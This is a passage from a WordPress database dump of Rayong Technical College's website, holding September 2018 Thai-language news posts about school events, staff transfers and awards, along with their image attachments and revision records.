(3961, 3, '2018-09-18 14:04:50', '2018-09-18 07:04:50', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.676746606034864&type=3\"><img class=\"aligncenter wp-image-3962\" src=\"/wp-content/uploads/2018/09/18-9-2561-14-05-14.jpg\" alt=\"\" width=\"500\" height=\"765\" /></a>', 'วันอังคารที่ 11 กันยายน 2561 นายไสว สีบูจันดี ผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นประธานในพิธีเปิด โครงการอบรมเชิงปฏิบัติการเสริมสร้างชีวิตพัฒนาความคิดแบบบุคลาธิษฐาน ต้านยาเสพติด ประจำปีงบประมาณ 2561 และได้รับเกียรติจากคณะผู้พิพากษาศาล จังหวัดระยอง และ ร.ต.ท.สุรเดช มณีพิทักษ์ มาให้ความรู้กับนักเรียน นักศึกษา เกี่ยวกับกฎหมายเยาวชนในสถานศึกษา และ เยาวชนยุคใหม่ ห่างไกลยาเสพติด โดยมีผู้เข้าร่วมจากสถานศึกษาสังกัดอาชีวศึกษาภาครัฐและภาคเอกชน ในจังหวัดระยอง จำนวน 350 คน ซึ่งโครงการดังกล่าวจัดขึ้นระหว่างวันที่ 11-12 กันยายน 2561 ณ วิทยาลัยเทคนิคระยอง และ เรือนจำกลาง จังหวัดระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%ad%e0%b8%b1%e0%b8%87%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%b5%e0%b9%88-11-%e0%b8%81%e0%b8%b1%e0%b8%99%e0%b8%a2%e0%b8%b2%e0%b8%a2%e0%b8%99-2561-%e0%b8%99%e0%b8%b2', '', '', '2018-09-18 14:04:50', '2018-09-18 07:04:50', '', 0, 'http://www.technicrayong.ac.th/?p=3961', 302, 'post', '', 0),
(3962, 3, '2018-09-18 14:02:48', '2018-09-18 07:02:48', '', '18-9-2561 14-05-14', '', 'inherit', 'closed', 'closed', '', '18-9-2561-14-05-14', '', '', '2018-09-18 14:02:48', '2018-09-18 07:02:48', '', 3961, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/18-9-2561-14-05-14.jpg', 0, 'attachment', 'image/jpeg', 0),
(3963, 3, '2018-09-18 14:04:36', '2018-09-18 07:04:36', '', '41667450_676746312701560_2795209667364519936_o', '', 'inherit', 'closed', 'closed', '', '41667450_676746312701560_2795209667364519936_o', '', '', '2018-09-18 14:04:36', '2018-09-18 07:04:36', '', 3961, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/41667450_676746312701560_2795209667364519936_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3964, 3, '2018-09-18 14:04:50', '2018-09-18 07:04:50', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.676746606034864&type=3\"><img class=\"aligncenter wp-image-3962\" src=\"/wp-content/uploads/2018/09/18-9-2561-14-05-14.jpg\" alt=\"\" width=\"500\" height=\"765\" /></a>', 'วันอังคารที่ 11 กันยายน 2561 นายไสว สีบูจันดี ผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นประธานในพิธีเปิด โครงการอบรมเชิงปฏิบัติการเสริมสร้างชีวิตพัฒนาความคิดแบบบุคลาธิษฐาน ต้านยาเสพติด ประจำปีงบประมาณ 2561 และได้รับเกียรติจากคณะผู้พิพากษาศาล จังหวัดระยอง และ ร.ต.ท.สุรเดช มณีพิทักษ์ มาให้ความรู้กับนักเรียน นักศึกษา เกี่ยวกับกฎหมายเยาวชนในสถานศึกษา และ เยาวชนยุคใหม่ ห่างไกลยาเสพติด โดยมีผู้เข้าร่วมจากสถานศึกษาสังกัดอาชีวศึกษาภาครัฐและภาคเอกชน ในจังหวัดระยอง จำนวน 350 คน ซึ่งโครงการดังกล่าวจัดขึ้นระหว่างวันที่ 11-12 กันยายน 2561 ณ วิทยาลัยเทคนิคระยอง และ เรือนจำกลาง จังหวัดระยอง', '', 'inherit', 'closed', 'closed', '', '3961-revision-v1', '', '', '2018-09-18 14:04:50', '2018-09-18 07:04:50', '', 3961, 'http://www.technicrayong.ac.th/3961-revision-v1/', 0, 'revision', '', 0),
(3965, 3, '2018-09-18 14:06:28', '2018-09-18 07:06:28', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D676754142700777%26id%3D100010985913485&width=500\" width=\"500\" height=\"688\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพุธที่ 12 กันยายน 2561 ชมรมแม่บ้านมหาดไทยจังหวัดระยอง ตรวจเยี่ยมบ้าน นายวิทวัส แย้มกลิ่น นักเรียนระดับ ปวช.3 สาขาวิชาช่างไฟฟ้ากำลัง เยาวชนผู้รับทุนการศึกษามูลนิธิร่วมจิตต์น้อมเกล้าฯ เพื่อเยาวชนในพระบรมราชินูปถัมภ์', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%b8%e0%b8%98%e0%b8%97%e0%b8%b5%e0%b9%88-12%e2%80%8b-%e0%b8%81%e0%b8%b1%e0%b8%99%e0%b8%a2%e0%b8%b2%e0%b8%a2%e0%b8%99%e2%80%8b-2561%e2%80%8b-%e0%b8%8a%e0%b8%a1', '', '', '2018-09-18 14:06:28', '2018-09-18 07:06:28', '', 0, 'http://www.technicrayong.ac.th/?p=3965', 301, 'post', '', 0),
(3966, 3, '2018-09-18 14:06:15', '2018-09-18 07:06:15', '', '41500268_676753659367492_7936221078987210752_o', '', 'inherit', 'closed', 'closed', '', '41500268_676753659367492_7936221078987210752_o', '', '', '2018-09-18 14:06:15', '2018-09-18 07:06:15', '', 3965, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/41500268_676753659367492_7936221078987210752_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3967, 3, '2018-09-18 14:06:28', '2018-09-18 07:06:28', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D676754142700777%26id%3D100010985913485&width=500\" width=\"500\" height=\"688\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพุธที่ 12 กันยายน 2561 ชมรมแม่บ้านมหาดไทยจังหวัดระยอง ตรวจเยี่ยมบ้าน นายวิทวัส แย้มกลิ่น นักเรียนระดับ ปวช.3 สาขาวิชาช่างไฟฟ้ากำลัง เยาวชนผู้รับทุนการศึกษามูลนิธิร่วมจิตต์น้อมเกล้าฯ เพื่อเยาวชนในพระบรมราชินูปถัมภ์', '', 'inherit', 'closed', 'closed', '', '3965-revision-v1', '', '', '2018-09-18 14:06:28', '2018-09-18 07:06:28', '', 3965, 'http://www.technicrayong.ac.th/3965-revision-v1/', 0, 'revision', '', 0),
(3968, 3, '2018-09-18 14:08:40', '2018-09-18 07:08:40', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D676870269355831%26id%3D100010985913485&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพุธที่ 12 กันยายน 2561 รองศาสตราจารย์นายแพทย์โศภณ นภาธร ผู้ช่วยรัฐมนตรีประจำกระทรวงศึกษาธิการ มอบใบประกาศเกียรติคุณให้แก่วิทยาลัยเทคนิคระยอง ซึ่งได้รับคัดเลือกให้เป็นสถานศึกษาคุณธรรมอาชีวศึกษาต้นแบบ โดยมีนายยุทธนา อ่อนส้มกฤษ รองผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นตัวแทนรับใบประกาศเกียรติคุณ ในการประชุมสัมมนา แลกเปลี่ยนเรียนรู้และจัดแสดงผลงานการขับเคลื่อนสถานศึกษาคุณธรรมอาชีวศึกษา ณ วิทยาลัยการอาชีวศึกษาปทุมธานี จังหวัดปทุมธานี', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%b8%e0%b8%98%e0%b8%97%e0%b8%b5%e0%b9%88%e2%80%8b-12%e2%80%8b-%e0%b8%81%e0%b8%b1%e0%b8%99%e0%b8%a2%e0%b8%b2%e0%b8%a2%e0%b8%99%e2%80%8b-2561%e2%80%8b-%e0%b8%a3', '', '', '2018-09-18 14:08:40', '2018-09-18 07:08:40', '', 0, 'http://www.technicrayong.ac.th/?p=3968', 300, 'post', '', 0),
(3969, 3, '2018-09-18 14:08:27', '2018-09-18 07:08:27', '', '41556893_676868739355984_1945381728503726080_o', '', 'inherit', 'closed', 'closed', '', '41556893_676868739355984_1945381728503726080_o', '', '', '2018-09-18 14:08:27', '2018-09-18 07:08:27', '', 3968, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/41556893_676868739355984_1945381728503726080_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3970, 3, '2018-09-18 14:08:40', '2018-09-18 07:08:40', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D676870269355831%26id%3D100010985913485&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพุธที่ 12 กันยายน 2561 รองศาสตราจารย์นายแพทย์โศภณ นภาธร ผู้ช่วยรัฐมนตรีประจำกระทรวงศึกษาธิการ มอบใบประกาศเกียรติคุณให้แก่วิทยาลัยเทคนิคระยอง ซึ่งได้รับคัดเลือกให้เป็นสถานศึกษาคุณธรรมอาชีวศึกษาต้นแบบ โดยมีนายยุทธนา อ่อนส้มกฤษ รองผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นตัวแทนรับใบประกาศเกียรติคุณ ในการประชุมสัมมนา แลกเปลี่ยนเรียนรู้และจัดแสดงผลงานการขับเคลื่อนสถานศึกษาคุณธรรมอาชีวศึกษา ณ วิทยาลัยการอาชีวศึกษาปทุมธานี จังหวัดปทุมธานี', '', 'inherit', 'closed', 'closed', '', '3968-revision-v1', '', '', '2018-09-18 14:08:40', '2018-09-18 07:08:40', '', 3968, 'http://www.technicrayong.ac.th/3968-revision-v1/', 0, 'revision', '', 0),
(3971, 3, '2018-09-18 14:14:34', '2018-09-18 07:14:34', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.676887226020802&type=3\"><img class=\"aligncenter size-full wp-image-3972\" src=\"/wp-content/uploads/2018/09/18-9-2561-14-12-34.jpg\" alt=\"\" width=\"460\" height=\"582\" /></a>', 'วันพุธที่ 12 กันยายน 2561 คณะผู้บริหาร ครู บุคลากรทางการศึกษา และนักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง ร่วมพิธีอำลาด้วยรักและผูกพัน นายไสว สีบูจันดี ผู้อำนวยการวิทยาลัยเทคนิคระยอง ย้ายไปดำรงตำแหน่งผู้อำนวยการวิทยาลัยอาชีวศึกษาสระบุรี', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%b8%e0%b8%98%e0%b8%97%e0%b8%b5%e0%b9%88-12-%e0%b8%81%e0%b8%b1%e0%b8%99%e0%b8%a2%e0%b8%b2%e0%b8%a2%e0%b8%99-2561-%e0%b8%84%e0%b8%93%e0%b8%b0%e0%b8%9c%e0%b8%b9', '', '', '2018-09-18 14:14:34', '2018-09-18 07:14:34', '', 0, 'http://www.technicrayong.ac.th/?p=3971', 299, 'post', '', 0),
(3972, 3, '2018-09-18 14:11:52', '2018-09-18 07:11:52', '', '18-9-2561 14-12-34', '', 'inherit', 'closed', 'closed', '', '18-9-2561-14-12-34', '', '', '2018-09-18 14:11:52', '2018-09-18 07:11:52', '', 3971, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/18-9-2561-14-12-34.jpg', 0, 'attachment', 'image/jpeg', 0),
(3973, 3, '2018-09-18 14:14:12', '2018-09-18 07:14:12', '', '41598651_676885376020987_5476268467030065152_o', '', 'inherit', 'closed', 'closed', '', '41598651_676885376020987_5476268467030065152_o', '', '', '2018-09-18 14:14:12', '2018-09-18 07:14:12', '', 3971, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/41598651_676885376020987_5476268467030065152_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3974, 3, '2018-09-18 14:14:34', '2018-09-18 07:14:34', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.676887226020802&type=3\"><img class=\"aligncenter size-full wp-image-3972\" src=\"/wp-content/uploads/2018/09/18-9-2561-14-12-34.jpg\" alt=\"\" width=\"460\" height=\"582\" /></a>', 'วันพุธที่ 12 กันยายน 2561 คณะผู้บริหาร ครู บุคลากรทางการศึกษา และนักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง ร่วมพิธีอำลาด้วยรักและผูกพัน นายไสว สีบูจันดี ผู้อำนวยการวิทยาลัยเทคนิคระยอง ย้ายไปดำรงตำแหน่งผู้อำนวยการวิทยาลัยอาชีวศึกษาสระบุรี', '', 'inherit', 'closed', 'closed', '', '3971-revision-v1', '', '', '2018-09-18 14:14:34', '2018-09-18 07:14:34', '', 3971, 'http://www.technicrayong.ac.th/3971-revision-v1/', 0, 'revision', '', 0),
(3975, 3, '2018-09-18 14:18:50', '2018-09-18 07:18:50', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.677198179323040&type=3\"><img class=\"aligncenter size-full wp-image-3976\" src=\"/wp-content/uploads/2018/09/18-9-2561-14-18-54.jpg\" alt=\"\" width=\"460\" height=\"609\" /></a>', 'วันพฤหัสบดีที่ 13 กันยายน 2561 คณะผู้บริหาร ครู บุคลากรทางการศึกษา และนักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง ร่วมพิธีอำลาด้วยรักและผู้พัน นายกิตติพงค์ อุตตมะเวทิน รองผู้อำนวยการวิทยาลัยเทคนิคระยอง ซึ่งย้ายไปดำรงตำแหน่งผู้อำนวยการวิทยาลัยเกษตรและเทคโนโลยีระนอง และผู้เกษียณอายุราชการ ประจำปีการศึกษา 2561 ณ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%a4%e0%b8%ab%e0%b8%b1%e0%b8%aa%e0%b8%9a%e0%b8%94%e0%b8%b5%e0%b8%97%e0%b8%b5%e0%b9%88-13-%e0%b8%81%e0%b8%b1%e0%b8%99%e0%b8%a2%e0%b8%b2%e0%b8%a2%e0%b8%99-2561', '', '', '2018-09-18 14:18:50', '2018-09-18 07:18:50', '', 0, 'http://www.technicrayong.ac.th/?p=3975', 298, 'post', '', 0),
(3976, 3, '2018-09-18 14:16:23', '2018-09-18 07:16:23', '', '18-9-2561 14-18-54', '', 'inherit', 'closed', 'closed', '', '18-9-2561-14-18-54', '', '', '2018-09-18 14:16:23', '2018-09-18 07:16:23', '', 3975, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/18-9-2561-14-18-54.jpg', 0, 'attachment', 'image/jpeg', 0),
(3977, 3, '2018-09-18 14:18:18', '2018-09-18 07:18:18', '', '41788378_677196889323169_1259277285836455936_o', '', 'inherit', 'closed', 'closed', '', '41788378_677196889323169_1259277285836455936_o', '', '', '2018-09-18 14:18:18', '2018-09-18 07:18:18', '', 3975, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/41788378_677196889323169_1259277285836455936_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3978, 3, '2018-09-18 14:18:50', '2018-09-18 07:18:50', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.677198179323040&type=3\"><img class=\"aligncenter size-full wp-image-3976\" src=\"/wp-content/uploads/2018/09/18-9-2561-14-18-54.jpg\" alt=\"\" width=\"460\" height=\"609\" /></a>', 'วันพฤหัสบดีที่ 13 กันยายน 2561 คณะผู้บริหาร ครู บุคลากรทางการศึกษา และนักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง ร่วมพิธีอำลาด้วยรักและผู้พัน นายกิตติพงค์ อุตตมะเวทิน รองผู้อำนวยการวิทยาลัยเทคนิคระยอง ซึ่งย้ายไปดำรงตำแหน่งผู้อำนวยการวิทยาลัยเกษตรและเทคโนโลยีระนอง และผู้เกษียณอายุราชการ ประจำปีการศึกษา 2561 ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3975-revision-v1', '', '', '2018-09-18 14:18:50', '2018-09-18 07:18:50', '', 3975, 'http://www.technicrayong.ac.th/3975-revision-v1/', 0, 'revision', '', 0),
(3979, 3, '2018-09-18 14:27:26', '2018-09-18 07:27:26', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.677298332646358%26type%3D3&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพฤหัสบดีที่ 13 กันยายน 2561 คณะผู้บริหาร ครู บุคลากรทางการศึกษา และนักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง ร่วมต้อนรับ ว่าที่เรือตรีชูชีพ อรุณเหลือง ซึ่งย้ายจากผู้อำนวยการวิทยาลัยเทคนิคบ้านค่าย มาดำรงตำแหน่งผู้อำนวยการวิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%a4%e0%b8%ab%e0%b8%b1%e0%b8%aa%e0%b8%9a%e0%b8%94%e0%b8%b5%e0%b8%97%e0%b8%b5%e0%b9%88-13-%e0%b8%81%e0%b8%b1%e0%b8%99%e0%b8%a2%e0%b8%b2%e0%b8%a2%e0%b8%99-2561-2', '', '', '2018-09-18 14:27:26', '2018-09-18 07:27:26', '', 0, 'http://www.technicrayong.ac.th/?p=3979', 297, 'post', '', 0),
(3980, 3, '2018-09-18 14:27:00', '2018-09-18 07:27:00', '', '41611741_677300639312794_3837811917611597824_o', '', 'inherit', 'closed', 'closed', '', '41611741_677300639312794_3837811917611597824_o', '', '', '2018-09-18 14:27:00', '2018-09-18 07:27:00', '', 3979, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/41611741_677300639312794_3837811917611597824_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3981, 3, '2018-09-18 14:27:26', '2018-09-18 07:27:26', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.677298332646358%26type%3D3&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพฤหัสบดีที่ 13 กันยายน 2561 คณะผู้บริหาร ครู บุคลากรทางการศึกษา และนักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง ร่วมต้อนรับ ว่าที่เรือตรีชูชีพ อรุณเหลือง ซึ่งย้ายจากผู้อำนวยการวิทยาลัยเทคนิคบ้านค่าย มาดำรงตำแหน่งผู้อำนวยการวิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3979-revision-v1', '', '', '2018-09-18 14:27:26', '2018-09-18 07:27:26', '', 3979, 'http://www.technicrayong.ac.th/3979-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(3982, 3, '2018-09-18 14:30:16', '2018-09-18 07:30:16', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D678154209227437%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ว่าที่เรือตรี ชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะผู้บริหาร หัวหน้าแผนกและหัวหน้างานวิทยาลัยเทคนิคระยอง เข้าร่วมการสัมมนาเชิงปฏิบัติการจัดทำแผนปฏิบัติราชการ ประจำปีงบประมาณ 2562 และแผนพัฒนาสถานศึกษา ประจำปีงบประมาณ 2562-2566 ระหว่างวันที่ 14-16 กันยายน 2561 ณ รอยัลฮิลล์ กอล์ฟ รีสอร์ทแอนด์สปา จังหวัดนครนายก', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b9%88%e0%b8%b2%e0%b8%97%e0%b8%b5%e0%b9%88%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b8%ad%e0%b8%95%e0%b8%a3%e0%b8%b5%e2%80%8b-%e0%b8%8a%e0%b8%b9%e0%b8%8a%e0%b8%b5%e0%b8%9e%e2%80%8b-%e0%b8%ad%e0%b8%a3', '', '', '2018-09-18 14:30:16', '2018-09-18 07:30:16', '', 0, 'http://www.technicrayong.ac.th/?p=3982', 296, 'post', '', 0),
(3983, 3, '2018-09-18 14:30:01', '2018-09-18 07:30:01', '', '41836333_678154112560780_2475173181485219840_n', '', 'inherit', 'closed', 'closed', '', '41836333_678154112560780_2475173181485219840_n', '', '', '2018-09-18 14:30:01', '2018-09-18 07:30:01', '', 3982, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/41836333_678154112560780_2475173181485219840_n.jpg', 0, 'attachment', 'image/jpeg', 0),
(3984, 3, '2018-09-18 14:30:16', '2018-09-18 07:30:16', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D678154209227437%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ว่าที่เรือตรี ชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะผู้บริหาร หัวหน้าแผนกและหัวหน้างานวิทยาลัยเทคนิคระยอง เข้าร่วมการสัมมนาเชิงปฏิบัติการจัดทำแผนปฏิบัติราชการ ประจำปีงบประมาณ 2562 และแผนพัฒนาสถานศึกษา ประจำปีงบประมาณ 2562-2566 ระหว่างวันที่ 14-16 กันยายน 2561 ณ รอยัลฮิลล์ กอล์ฟ รีสอร์ทแอนด์สปา จังหวัดนครนายก', '', 'inherit', 'closed', 'closed', '', '3982-revision-v1', '', '', '2018-09-18 14:30:16', '2018-09-18 07:30:16', '', 3982, 'http://www.technicrayong.ac.th/3982-revision-v1/', 0, 'revision', '', 0),
(3985, 3, '2018-09-18 14:33:32', '2018-09-18 07:33:32', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D679217565787768%26id%3D100010985913485&width=500\" width=\"500\" height=\"742\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันจันทร์ที่ 17 กันยายน 2561 วิทยาลัยเทคนิคระยอง นำโดยนายยุทธนา อ่อนส้มกฤษ รองผู้อำนวยการฝ่ายพัฒนากิจการนักเรียน นักศึกษา พร้อมด้วย คณะครู บุคลากรทางการศึกษาวิทยาลัยเทคนิคระยอง จัดโครงการอบรมหลักสูตรระยะสั้นให้กับนักเรียนผู้บกพร่องทางปัญญา ณ โรงเรียนปัญญานุกูล จังหวัดระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%88%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88-17-%e0%b8%81%e0%b8%b1%e0%b8%99%e0%b8%a2%e0%b8%b2%e0%b8%a2%e0%b8%99-2561-%e0%b8%a7%e0%b8%b4', '', '', '2018-09-18 14:34:20', '2018-09-18 07:34:20', '', 0, 'http://www.technicrayong.ac.th/?p=3985', 295, 'post', '', 0),
(3986, 3, '2018-09-18 14:33:10', '2018-09-18 07:33:10', '', '42058456_679546969088161_4259799150297612288_o', '', 'inherit', 'closed', 'closed', '', '42058456_679546969088161_4259799150297612288_o', '', '', '2018-09-18 14:33:10', '2018-09-18 07:33:10', '', 3985, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/42058456_679546969088161_4259799150297612288_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3987, 3, '2018-09-18 14:33:32', '2018-09-18 07:33:32', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D679217565787768%26id%3D100010985913485&width=500\" width=\"500\" height=\"742\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันจันทร์ที่ 17 กันยายน 2561 วิทยาลัยเทคนิคระยอง นำโดยนายยุทธนา อ่อนส้มกฤษ รองผู้อำนวยการฝ่ายพัฒนากิจการนักเรียน นักศึกษา พร้อมด้วย คณะครู บุคลากรทางการศึกษาวิทยาลัยเทคนิคระยอง จัดโครงการอบรมหลักสูตรระยะสั้นให้กับนักเรียนผู้บกพร่องทางปัญญา ณ โรงเรียนปัญญานุกูล จังหวัดระยอง', '', 'inherit', 'closed', 'closed', '', '3985-revision-v1', '', '', '2018-09-18 14:33:32', '2018-09-18 07:33:32', '', 3985, 'http://www.technicrayong.ac.th/3985-revision-v1/', 0, 'revision', '', 0),
(3988, 3, '2018-09-18 14:36:57', '2018-09-18 07:36:57', '<a href=\"https://www.facebook.com/incubator.rtc/media_set?set=a.2201100180155082&type=3\"><img class=\"aligncenter size-full wp-image-3989\" src=\"/wp-content/uploads/2018/09/18-9-2561-14-38-16.jpg\" alt=\"\" width=\"457\" height=\"567\" /></a>', 'ศูนย์บ่มเพาะผู้ประกอบการอาชีวศึกษา วิทยาลัยเทคนิคระยอง ต้อนรับคณะศึกษาดูงานจากวิทยาลัยเทคนิคปราจีนบุรี โดยนายอานุภาพ วาสะสิริ รองผู้อำนวยการฝ่ายแผนงานและความร่วมมือ และนางกุสุมาทย์ ชูจิตต์ ครูแผนกวิชาการตลาด บรรยายให้ความรู้ และพาเยี่ยมชมศูนย์บ่มเพาะแต่ละธุรกิจ กับคณะศึกษาดูงาน ในวันที่ 18 กันยายน 2561 ณ ห้อง Smart ClassRoom วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a8%e0%b8%b9%e0%b8%99%e0%b8%a2%e0%b9%8c%e0%b8%9a%e0%b9%88%e0%b8%a1%e0%b9%80%e0%b8%9e%e0%b8%b2%e0%b8%b0%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%ad%e0%b8%9a%e0%b8%81-2', '', '', '2018-09-18 14:36:57', '2018-09-18 07:36:57', '', 0, 'http://www.technicrayong.ac.th/?p=3988', 294, 'post', '', 0),
(3989, 3, '2018-09-18 14:35:44', '2018-09-18 07:35:44', '', '18-9-2561 14-38-16', '', 'inherit', 'closed', 'closed', '', '18-9-2561-14-38-16', '', '', '2018-09-18 14:35:44', '2018-09-18 07:35:44', '', 3988, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/18-9-2561-14-38-16.jpg', 0, 'attachment', 'image/jpeg', 0),
(3990, 3, '2018-09-18 14:36:35', '2018-09-18 07:36:35', '', '41961993_2201098220155278_2110555764002127872_o', '', 'inherit', 'closed', 'closed', '', '41961993_2201098220155278_2110555764002127872_o', '', '', '2018-09-18 14:36:35', '2018-09-18 07:36:35', '', 3988, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/41961993_2201098220155278_2110555764002127872_o.jpg', 0, 'attachment', 'image/jpeg', 0),
